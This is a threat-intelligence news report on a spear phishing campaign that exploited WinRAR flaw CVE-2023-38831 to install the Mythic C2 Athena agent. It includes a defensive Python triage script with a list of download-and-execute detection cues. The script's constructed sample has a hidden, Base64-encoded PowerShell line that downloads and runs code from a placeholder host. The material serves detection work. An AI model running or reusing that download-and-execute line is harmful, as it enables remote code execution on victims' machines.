Researchers from Cyble Research and Intelligence Labs (CRIL) have uncovered a targeted spear phishing attack on a prominent Russian semiconductor supplier.
The threat actors behind this attack utilized a critical Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deploy their payload.
This malicious payload is the Athena agent of the Mythic C2 framework, designed to grant complete control over compromised systems.
The Athena Agent Capabilities and Features
The Athena Agent is equipped with an extensive set of pre-installed commands tailored to perform various actions on the targeted systems.
Designed using the cross-platform version of .NET (not to be confused with .NET Framework), it is a “fully-featured cross-platform agent” for Mythic 3.0 and newer.
Athena comes loaded with features such as cross-platform support for Windows, Linux, and OSX, SOCKS5 support, reverse port forwarding, reflective loading of assemblies, modular loading of commands, and much more.
These actions encompass injecting assemblies, executing shellcode, capturing authentication details, loading Beacon Object Files (BOFs), and an array of other functionalities. This tool serves as a critical component in the attacker’s toolkit.
Following this, Group-IB’s Threat Intelligence unit found a previously undisclosed vulnerability in WinRAR’s ZIP file processing.
The RARLAB team swiftly addressed the flaw, releasing the updated WinRAR version 6.23 on August 2, 2023. The vulnerability, designated CVE-2023-38831, became the focal point for a wave of attacks.
Following the discovery, the exploit quickly gained traction within the dark web community. Malicious actors, including AegisCrypter, began offering this exploit for sale.
Additionally, a Proof-of-Concept (POC) for this exploit became publicly accessible on GitHub, leading to its integration into various attacker toolkits.
Technical analysis of Athena campaign
The exploit’s widespread adoption led to its incorporation by multiple threat actors, including the notorious APT-36 group, known for targeting Indian government organizations and defense contractors.
Moreover, CRIL also found a spear phishing campaign using phishing emails to target victims in Russia. Disguised as official communication from the Ministry of Industry and Trade of Russia, the email carried a deceptive archive file named “resultati_sovehchaniya_11_09_2023.rar.”
This file, exploiting the CVE-2023-38831 vulnerability, was the vehicle for delivering the Athena Agent. The vulnerability in question triggers an unusual behavior in WinRAR, leading to the extraction of a malicious CMD script alongside the intended benign file. This script, containing a Base64-encoded PowerShell script, orchestrates the download and execution of the Athena Agent.
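Triage code for the delivery chain described above, written for this page as an added example (not Cyble’s, CRIL’s or The Cyber Express’s tooling): it flags archive entries where a script shares its name with a document entry, and decodes the Base64-encoded PowerShell carried by a dropped CMD script to surface download-and-execute cues. The archive, script and URL are constructed placeholders, and the archive check reads ZIP structure, the format the flaw concerns.

```python
import base64
import io
import re
import zipfile

SCRIPT_EXT = (".cmd", ".bat", ".ps1", ".vbs")
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                 "net.webclient", "invoke-expression", "iex ", "start-process")
# -EncodedCommand and its short forms, followed by a Base64 blob
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

def _base(name: str) -> str:
    return name.rsplit("/", 1)[-1].rstrip(" ").lower()

def colliding_script_entries(archive: bytes) -> list:
    """Script entries whose name, minus the script extension, equals a document entry."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        names = zf.namelist()
    docs = {_base(n) for n in names if _base(n).endswith(DOC_EXT)}
    hits = []
    for n in names:
        b = _base(n)
        for ext in SCRIPT_EXT:
            if b.endswith(ext) and b[: -len(ext)].rstrip(" ") in docs:
                hits.append(n)
    return hits

def decode_encoded_powershell(cmd_text: str) -> list:
    """Decode -EncodedCommand blobs (Base64 of UTF-16LE) and list download/exec cues."""
    findings = []
    for blob in ENC_RE.findall(cmd_text):
        try:
            script = base64.b64decode(blob).decode("utf-16-le", errors="replace")
        except ValueError:
            continue  # not valid Base64; skip rather than abort triage
        cues = sorted(c.strip() for c in DOWNLOAD_CUES if c in script.lower())
        findings.append({"script": script, "cues": cues})
    return findings

# Constructed sample (not the campaign's artefact): a document and a same-named CMD script
SAMPLE_PS = 'IEX (New-Object Net.WebClient).DownloadString("http://placeholder.invalid/a")'
SAMPLE_CMD = "@echo off\r\npowershell -nop -w hidden -EncodedCommand " + \
    base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii") + "\r\n"

def build_sample_archive() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("summary.pdf", b"%PDF-1.4 placeholder")
        zf.writestr("summary.pdf.cmd", SAMPLE_CMD)
    return buf.getvalue()
```

Run `colliding_script_entries(build_sample_archive())` and `decode_encoded_powershell(SAMPLE_CMD)` on the constructed sample; on real triage, feed it the archive bytes and the text of any .cmd file extracted alongside a document.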
The Athena Agent is an essential component of the Mythic C2 framework, providing a collaborative and user-friendly interface for operators. Its cross-platform compatibility and diverse set of functionalities make it an invaluable asset for threat actors seeking to gain control over compromised systems.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.